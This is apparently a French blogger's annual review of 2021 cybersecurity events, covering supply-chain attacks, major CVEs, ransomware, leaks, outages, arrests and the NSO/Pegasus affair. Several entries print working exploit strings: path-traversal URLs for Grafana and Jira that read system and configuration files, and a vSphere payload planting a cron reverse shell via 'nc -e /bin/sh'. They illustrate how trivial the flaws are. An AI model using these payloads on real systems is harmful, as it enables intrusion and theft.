Le Top arbitraire de l’année écoulée 2021

Le voici, le voilà, il sent le poisson pas frais et les lendemains de cuite 🥳, c’est mon traditionnel top arbitraire des évènements de cybersécurité de l’année écoulée 2021 🎊.

S’agissant d’un « top », le but n’est pas de détailler chaque sujet, pour cela, je vous renvoie vers les revues d’actualité de l’OSSIR en PDF et vidéo (https://www.ossir.org/support-des-presentations/?date=2021)

Entrons dans le vif du sujet, l’année 2020 fut assez catastrophique avec des fuites majeures de données, des compromissions à grande échelle de fournisseurs, des vulnérabilités majeures…

J’avais d’ailleurs terminé l’année par ce mème accompagnent mes voeux test :

La principale question que l’on peut se poser est alors : « qu’est-ce qu’a été l’année 2021 ? »

Un indice, j’avais débuté l’année par ce montage 😂 :

Les attaques dites « de la chaîne d’approvisionnement » ou « supply chain attack » sont anciennes, mais elles sont de plus en plus utilisées ces dernières années.

Souvenez-vous des piratages de :

• Juniper en 2015, avec l’ajout d’un mot de passe générique permettant de s’authentifier à la place de tout utilisateur, ce qui avait occasionné une chute du cours en bourse ;
• CCleaner en 2017, avec l’ajout d’un malware dans une version spécifique de l’outil, installé automatiquement si les mises à jour automatique étaient activées ;
• L’éditeur ukiranien MEDoc en 2017, avec la fameuse attaque NotPetya détruisant les systèmes d’information de Saint-Gobain, Maersk…
• L’éditeur NetSarang en 2017 (outil de gestion de serveurs), avec l’ajout d’une porte dérobée nommée ShadowPad ;
• ASUS en 2019, avec des mises à jour malveillantes, pourtant signées, sur les ordinateurs portables ASUS ;
• …

2021 a confirmé cette tendance avec des piratages de plus en plusimportants.

En 2021, nous avons eu les suites du piratage de Solarwinds, qui pour rappel avait abouti à la compromission de milliers d’agences américaines, de Microsoft, FireEye… :

• Confirmation des compromissions de Qualys, MalwareBytes, Mime et Palo Alto Networks (revue du 2021-02-09)
• Confirmation des compromissions de la NASA et la FAA (revue du 2021-03-09)
• « C’est pas notre faute, c’est le stagiaire ! » (revue du 2021-03-09)

En 2021, nous avons eu les piratages de :

• Stormshield avec la fuite des codes source des firewalls SNS et SNI, ainsi que la mise sous observation par l’ANSSI des qualifications et agréments des dits produits (revue du 2021-02-09)
• Plus de 30 000 administrations américaines avec la vulnérabilité ProxyLogon, touchant Microsoft Exchange, que nous verrons juste après (revue du 2021-03-09)
• Nombreuses entreprises utilisant Centreon, outil de supervision réseau (revue du 2021-03-09)
• Codecov, outil d’analyse de code, utilisé par plus de 9 000 projets open source (revue du 2021-05-13)

En 2021, comme les années précédentes, nous avons eu les déploiements de bibliothèques vérolées :

• « pm run for your lives » avec la publication de paquets usurpant le nom de paquets utilisés en interne chez Apple, Amazon, Yelp, Microsoft, Slack… (revue du 2021-03-09)
• Encore et toujours des bibliothèques malveillantes chez PyPi (revue du 2021-12-12)
• Encore et toujours des bibliothèques « backdoorées » chez npm, avec ce coup-ci le piratage du compte du mainteneur (revue du 2021-11-09)

La situation semble de pire en pire et c’est en partie vrai, pour trois principales raisons :

1. Il y’a de plus en plus de vulnérabilités car de plus en plus de personnes, outils, entreprises… en cherchent. Donc statistiquement, il y’a plus de vulnérabilités critiques ;
2. Les logiciels très largement utilisés sont peu nombreux (ce sont souvent les mêmes) et tout (ou presque) étant connecté à Internet, une vulnérabilité critique sur un de ces logiciels impacte alors des centaines de milliers voire des millions d’entreprises, collectivités territoriales, agences gouvernementales, individus…
3. Enfin, nous en parlons tous beaucoup plus qu’avant, avec une portée plus large, rendant ces vulnérabilités plus visibles.

2021 a confirmé cette tendance avec un plus grand nombre de vulnérabilités majeures ayant des impacts majeurs.

D’ailleurs, cette année s’est conclue avec Log4J qui est définitivement caractéristique de 2021.

En 2021, nous avons eu le vrai correctif pour ZeroLogon, vulnérabilitépermettant de devenir instantanément administrateur d’un domaine Microsoft Active Directory (revue du 2021-02-09) :

En 2021, nous avons eu Microsoft Exchange, le logiciel de gestion des mails, revenu à la mode (pour les attaquants) et bourré de vulnérabilités majeures :

• ProxyLogon, prise de contrôle à distance sans authentification (revue du 2021-03-09):

• La récupération complète d’une boite mail sans authentification (revue du 2021-04-13): CVE-2021-26855 ; ; CVSS=9.1/10
• ProxyOracle, du « padding oracle » vieux comme le monde (revue du 2021-03-09):

• 4 prises de contrôle à distance sans authentification (revue du 2021-09-14):

• ProxyShell, prise de contrôle à distance sans authentification (revue du 2021-09-14):

En 2021, Microsoft Azure CosmoDB (avec Jupyter Notebook) a connu la fuite des clefs CosmoDB depuis tous les Notebook, permettant de voler les données de toutes les bases de données de tous les clients (revue du 2021-09-14).

En 2021, l’éditeur VMWare, leader des solutions de virtualisation, a souffert de vulnérabilités majeures sur ses produits phares, parfois exposés en direct sur Internet 🤦‍♂️ :

• vSphere, prise de contrôle à distance sans authentification (revue du 2021-03-09): CVE-2021- 21972 et CVE-2021-21973 ; exploitées massivement dans la nature ; CVSS=9.8/10
• vSphere, prise de contrôle à distance sans authentification (revue du 2021-10-12): CVE-2021-22005 ; exploitée massivement dans la nature ; CVSS=9.8/10
• vCenter, le logiciel de gestion des hyperviseurs, vulnérable à une prise de contrôle à distance sans authentification (revue du 2021-10-12) : CVE-2021-21972 ; exploitée massivement dans la nature ; CVSS=9.8/10

En 2021, l’éditeur de Palo Alto Networks a souffert aussi d’une prise de contrôle à distance sans authentification (revue du 2021-12-12) :

En 2021, Bloomberg a publié un article sur les 3 piratages de Juniper(éditeur de routeurs et firewalls) ayant conduits aux ajouts de portes dérobées par (revue du 2021-09-14) :

• Les Américains en 2008
• Les Chinois en 2012
• A nouveau les Chinois en 2014 Et depuis ? Bonne question 😉.

En 2021, Gitlab CE, le logiciel de gestion de code source et usine logicielle (pipeline CI/CD) était vulnérable à une prise de contrôle à distance sans authentification (revue du 2021-11-09) :

Faisons un passage éclair sur ce que vous utilisez le plus et pour lesquels des centaines de vulnérabilités ont été corrigés en 2021 :

• Les navigateurs (toutes les revues 😉) : Chrome : 309 dont 48 élevées ou critiques Firefox : 121 dont 52 élevées ou critiques Microsoft Edge : 26 (dont 2 critiques) Microsoft Edge Chromium : beaucoup (dont au moins 50 élevées ou critiques)
• Les smartphones (toutes les revues 😉) : Android : 574 dont 151 élevées ou critiques iOS : 336 dont 234 élevées ou critiques

iOS, nous en reparlerons dans la partie juridique, avec l’affaire “NSO Group”.

Et pour finir, vous l’attendiez tous, car elle a pourri nos vacances de Noël : Log4J 🥳🎉, bibliothèque de journalisation, avec une prise de contrôle à distance sans authentification (revue du 2021-12-12) :

• Une histoire démarrant avec des joueurs Minecraft piratant d’autre joueurs ;
• Une histoire touchant la planète entière ;
• Une histoire sans fin avec un enchaînement de correctifs et de découvertes de nouvelles vulnérabilités :

• Une histoire dans laquelle il faut remercier SwitHak pour avoir mis à disposition un suivi de tous les éditeurs impactés, suivi par le CERT hollandais (NCSC-NL)

De mes souvenir, c’est vers 2014-2015 que les gens ont commencé à se rendre compte que les produits de cybersécurité étaient des logiciels comme les autres : bourrés de vulnérabilités.

Je me souviens en particulier des travaux de Tavis Ormandi qui avait trouvé des vulnérabilités critiques dans les antivirus les plus connus.

2021 a été dans la continuité des années précédentes. En 2021, nous avons pu voir des vulnérabilités sur les solutions de sécurité de l’éditeur Fortinet :

• FortiWeb, pare-feu applicatif ou WAF, avec des prises de contrôle à distance sans authentification (revue du 2021-02-09):

  ○ CVE-2020-29016 et CVE-2020-29019 (Buffer overflow), CVE-2020-29015 (SQL Injection) …; exploitées dans la nature ; CVSS=9.8/10

• FortiWan, avec une prise de contrôle à distance sans authentification (revue du 2021-05-13):

  ○ CVE-2021-26102 ; exploitée dans la nature ; CVSS=9.8/10 En 2021, à nouveau les firewalls Palo Alto Network ont eu une prise de contrôle à distance sans authentification sur le service Telnet (revue du 2021-03-09): ○ CVE-2020-10188 ; ; CVSS=8.1/10

En 2021, le logiciel d’analyse de logs (SIEM) IBM Qradar a souffert d’une prise de contrôle à distance sans authentification (revue du 2021-02-09) :

• F5, avec des dizaines de vulnérabilité permettant de prendre le contrôle à distance sans authentification (revue du 2021-04-13)
• Cisco, avec des centaines de vulnérabilités aboutissant à des prises de contrôles à distance sans authentification (toutes les revues 😉)

<<Les années 90 viennent d’appeler, elles veulent récupérer leurs vulnérabilités...>>

Lorsque l’on voit certaines vulnérabilités de 2021, leur aspect technique, la trivialité avec laquelle elles peuvent être exploitées, nous sommes tentés de faire un parallèle avec les débuts d’Internet dans les années 90-2000 et l’absence quasi-totale de sécurité. Microsoft semble un spécialiste de la discipline :

• PrintNightmare, le feuilleton de l’été 2021 avec une floppée de correctifs incomplets et de vulnérabilités sur le spooler d’impression (revue du 2021-09-14) :

  ○ CVE-2021-1675, CVE-2021-34527, CVE-2021-36936, CVE-2021-36958 ; exploitées massivement dans la nature ; CVSS=8.8/10

• SigRed, la fameuse prise de contrôle à distance sans authentification des serveurs DNS Windows par une simple requête DNS de type SIG (revue du 2021-03-09) :

• SeriousSAM ou HiveNightmare, l’erreur incroyable de Microsoft concernant les droits à la base SAM des mots de passe de Windows (revue du 2021-09-14) :

  ○ CVE-2021-36934 ; exploitée dans la nature ; CVSS=7.8/10

• PetitPotam ou EfsPotato, permettant d’obtenir un compte de domaine AD sans authentification, du pur bonheur pour les pentesteurs et les cybercriminels (revue du 2021-09-14) :

  ○ CVE-2021-36942 ; exploitée dans la nature ; CVSS=7.5/10

• L’élévation locale (et triviale) de privilèges grâce à l’installation du pilote des souris Razer (revue du 2021-11-09)
• La corruption du système de fichier (partition NTFS) de Windows, juste en essayant d’accéder à C::$i30:$bitmap (revue du 2021-02-09)
• Déni de service (DoS) sur Windows par un simple paquet IPv6 routable sur Internet (revue du 2021-03-09) :

• Grafana (revue du 2021-12-12) :

  ○ CVE-2021-43798 ; ; CVSS=7.5/10 ○ Avec un simple : « http://cible:3000/public/plugins/loki/../../../../../../../../etc/passwd »

• VMWare vSphere, déjà vu plus haut (revue du 2021-10-12) :

  ○ CVE-2021-22005 ; exploitée massivement dans la nature ; CVSS=9.8/10 ○ Avec un simple : « https://cible/analytics/telemetry/ph/api/hyper/send?\_c=&\_i=/../../../../../../etc/cron.d/$RANDOM -H Content-Type: -d "* * * * * root nc -e /bin/sh IP-SHELLBACK 4444 »

• Atlassian Jira Server (revue du 2021-10-12) :

  ○ CVE-2021-26086 ; exploitée dans la nature ; CVSS=5.3/10 ○ Avec un simple « http://cible/s/cfx/_/;/WEB-INF/web.xml » ou « http://cible/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties »

• Apache HTTPD , avec la prise de contrôle à distance sans authentification dont le premier correctif a été contourné (revue du 2021-10-12) :

Et je ne vais pas parler des routeurs SOHO, ces boitiers réseau pour les petites entreprises ou les particuliers, faisant du WiFi, de l’accès Internet… bourrés de vulnérabilités triviales (revue du 2021-03-09).

Ce modèle d’affaire des cybercriminels ne semble pas ralentir (toutes les revues 😉) avec quelques faits marquants ou sortant de l’ordinaire.

Le groupe Revil a commencé à cibler les assureurs pour trouver de nouvelles cibles (revue du 2021-04-13) Le groupe Babuk a compromis la Police de Washington D.C. et menacé de de publier des informations sur leurs informateurs (revue du 2021-05-13). Le Groupe DarkSide (un affilié) a piraté et rançonné le pipeline américain « Colonial Pipeline » (revue du 2021-05-13). Le groupe Conti a piraté un diamantaire anglais et s’en est excusé (sur demande du Kremlin) après avoir publié les données, dont certaines en lien avec Mohammed Bin Salman (revue du 2021-11-09).

Quoi de mieux que de pirater un chercheur en cybersécurité et de lui voler ses travaux dont ses vulnérabilités non encore publiées. Ce n’est pas vraiment une nouveauté mais en 2021, il y’a eu plusieurs affaires de ce type.

Une campagne d'espionnage (menée par la Corée du nord) a ciblé des chercheurs en cybersécurité par des faux profils de chercheurs, faux blog et envois de projets Visual Studio piégés (revue du 2021-02-09). L’entreprise Bastion Secure (en réalité le groupe FIN7) a publié de fausses offres d’emploi, pour manipuler chercheurs et leur faire mener des attaques de rançongiciel (revue du 2021-11-09).

A chaque année ses fuites de données et 2021 n’y fait pas exception avec un grand nombre de fuites de données ou d’atteintes à la vie privée.

Il y’a eu l’affaire Dedalus, avec le vol et la publication de données médicales concernant 491 840 français dont 300 000 bretons (revue du 2021-03-09) Comme chaque année, Facebook a été mêlé à des problèmes concernant les données personnelles :

• Vol et publication de 533 millions de comptes (revue du 2021-04-13)
• Une lanceuse d’alerte a dénoncé les abus et les mensonges (revue du 2021-10-12) Après la fuite des condensats des mots de passe en 2012, en 2021, Linkedin a subi un téléchargement massif (scrapping) des données et leur publication, concernant 700 millions d’utilisateurs (oublié de la revue 😥) Une liste de 86 939 identifiants et mots de passe de VPN Fortinet a été publiée (revue du 2021-09-14) Twitch a été piraté et TOUS leurs outils 🤯 ainsi que beaucoup de données ont été publiés (revue du 2021-10-12) Après la sortie chaotique du jeu Cyberpunk 2077, CD Projekt a été piraté avec le vol des codes source et un chantage (revue du 2021-03-09)

Gravatar a été piraté avec la fuite des données de 124 millions d’utilisateurs (revue du 2021-12-12) Enfin en 2021, Wired a publié un article sur Amazon et le manque de respect pour les données de ses clients (revue du 2021-12-12)

Un peu comme pour les vulnérabilités majeures, certaines pannes ont un impact très large et chaque année, les différents acteurs du web arrivent à nous surprendre par la créativité de leurs pannes, en particulier chez les GAFAM/MAGMA, pour lesquels cela arrive régulièrement.

Le CDN Fastly a eu une “courte” panne avec de nombreux impacts en cascade (2021-09-14) Facebook est tombé en panne du fait d’un problème BGP (revue du 2021-10-12)

• Encore la faute de BGP “Bridging Gap Protocol” 🤦‍♂️🤦‍♂️🤦‍♂️ selon skynews Microsoft Azure a subi une méga panne (en octobre mais oublié de la revue 😥) AWS est encore tombé en panne, plusieurs fois (revue du 2021-12-12) OVH a subi un incendie du datacenter SBG2 de Strasbourg à cause d’un onduleur (revue du 2021-04-13) Google a supprimé tout le contenu de HackerNews, dont les sauvegardes (revue du 2021-11-09) Lors du passage à 2022, Microsoft Exchange a eu du mal à passer à la nouvelle année et toutes les instances sont tombées en panne (revue du 2022-01-11)

Heureusement, nos forces de l’ordre ne chôment pas et arrêtent régulièrement des cybercriminels.

Cette année 2021 fut particulièrement riche en arrestations. Des opérateurs d'Egregor ont été Interpellés (revue du 2021-03-09) Le cerveau technique du groupe FIN7, a été condamné à 10 ans de prison (revue du 2021-05-13) 7 membres de Revil/GanCrab ont été arrêtés (revue du 2021-11-09) Europol a réalisé de belles opérations :

• Arrestation des principaux membres d’Emotet, filmée et cela ressemblait à une parodie de cybercriminels (revue du 2021-02-09)
• Arrestation de 12 cybercriminels liés aux déploiements des ransomwares LockerGoga, MegaCortex et Dharma (revue du 2021-11-09)
• Opération « HAECHI-II » avec l’arrestation de 1 000 personnes liées à des arnaques au président (revue du 2021-12-12) La gendarmerie et Europol ont arrêté plus de 150 cybercriminels lors de l’opération « Dark HunTOR » (revue du 2021-11-09) De très nombreux criminels et cybercriminels, utilisateurs de Sky ECC (smartphones sécurisés) ont été arrêtés (revue du 2021-12-12)

Plusieurs conférences ou évènements liés à la cybersécurité sont sortis du lot en 2021.

Ces conférences ou évènements ou médias de cybersécurité sont les suivants :

• Le Netmask et la Plume 😍😍😍(revue du 2021-09-14)
• Unlock Your Brain 👍, en novembre, à Brest
• Barbhack, en aout, à Toulon (revue du 2021-09-14)
• Le blog Pwned chez substack (revue du 2021-10-12)
• Tianfucup 2021, le Pwn2Own Chinois (revue du 2021-11-09)
• Pwn2Own Austin 2021, Spécial imprimantes, routeurs, smartphones…, avec une belle première place de Synacktiv (revue du 2021-11-09)

Chaque année voit son lot de rachats, levées de fonds, coups bas et de créations de groupements d’intérêts.

2021 fut là encore une année particulièrement riche dans ces domaines. Tenable a racheté Alsid pour $98m (revue du 2021-03-09) Datadog a racheté Sqreen avec Bercy qui a étudié de près le dossier (revue du 2021-03-09) ThreatQuotient a levé $22m (revue du 2021-04-13) Glimps a levé 6m€ (revue du 2021-04-13) La liste des membres de GAIA-X (le Cloud Européen), a été publiée mais composée de très (trop) nombreux éditeurs non européens (revue du 2021-04-13) CrowdSec a levé 5m€ (revue du 2021-05-13) FireEye a été vendu pour $1,2 milliards (revue du 2021-09-14) Vade Secure s’est fait « Alstomer » par les USA avec une amende de $14m (revue du 2021-09-14)

• Et peut-être $29m supplémentaires (revue du 2021-11-09) F5 a acquis Threat Stack pour $68m (revue du 2021-10-12) Dell et VMWare se sont séparés (revue du 2021-11-09)

Les publications sont essentielles pour aider à améliorer le niveau de tous et pour certaines, deviennent les référentiels du domaine.

L'ANSSI a publié, entre autres :

• Un référentiel pour les vérifications d'identité à distance (revue du 2021-03-09)
• La cybersécurité pour les TPE / PME en 12 questions
• Un modèle « Zero Trust » (revue du 2021-05-13)
• Réécrit complètement son guide de l’authentification 🤩 (revue du 2021-10-12) La NSA aussi a publié ses recommandations pour mettre en place du « Zero Trust », à commencer par ne pas leur faire confiance 🤣 (revue du 2021-03-09) L'authentification forte est devenue obligatoire pour les banques depuis le 15 mai 2021, pour les montants supérieurs à 30€ (revue du 2021-03-09)

Cette année a été particulièrement marquée par des évènements juridiques.

Le risque cyber a été classé parmi les principaux selon le "forum de Davos" (revue du 2021-02-09) À la suite des modifications des conditions d’utilisation de Whatsapp, les gens ont massivement migré sur Signal (revue du 2021-02-09)

• Avec l’augmentation de la valeur de l’action de Signal… Advance Inc , sans aucun rapport avec Signal
• Et Signal a été inondé de messages tentant de récupérer les emails des utilisateurs, pour proposer du sexting, camgirls et porno Github a mis à jour sa politique, interdisant les exploits, outils offensifs... (revue du 2021-05-13) Le doxxing a été rendu illégal Le gouvernement Chinois a annoncé préempter les vulnérabilités trouvées par ses citoyens (revue du 2021-10-12) Nous terminerons en beauté avec NSO Group et son malware Pegasus.

L'entreprise israélienne (connue depuis longtemps et en lien avec l'affaire Khashoggi) et son malware ont été au coeur d’une des plus grosses affaires d'espionnage de ces dernières années avec :

• La sortie d’une liste de 50 000 victimes fournie à des journalistes et contenant des politiques, un numéro d'Emmanuel Macron, des journalistes, des employés du département d’état américain, des opposants politiques, des activistes au sultanat du Bahrain... (revue du 2021-03-09)
• La découverte par le grand public des attaques dites "Zero Click" permettant de pirater tout smartphone à jour des derniers correctifs de sécurité (revue du 2021-09-14)
• L'intervention d'Amnesty International et CitizenLab pour analyser le malware et les vulnérabilités utilisées (revue du 2021-09-14)
• La mise de NSO sur la liste noire du département du commerce américain (revue du 2021-11-09)
• Le procès engagé par Whatsapp, duquel NSO n'a pas pu se soustraire (revue du 2021-11-09)
• La plainte d'Apple pour leur interdire l'utilisation d’outils, appareils... d'Apple (revue du 2021-12-12)
• La démission du CEO (revue du 2021-12-12)

.".."..".."..".."..".."..".."..".."._

Finalement, ce qui me semble caractériser le plus cette année c’est le très grand nombre de vulnérabilités :

1. A la criticité très élevée ;
2. Ressemblant à des vulnérabilités des années 90-2000 ;
3. Massivement exploitées très rapidement après l’annonce de leur existence ;
4. Touchant souvent des composants open source inclus dans ces logiciels propriétaires utilisés partout ;
5. Avec de multiples correctifs incomplets ou des temps de corrections très long. Je radote en disant cela mais ce qui a sauvé beaucoup d’entreprises ce sont simplement les bonnes pratiques tel que le cloisonnement strict. Pour cette nouvelle année 2022, je vous souhaite le meilleur, la santé et j’espère vous voir très prochainement devant une bonne bière 🍻. Bonne année à tous.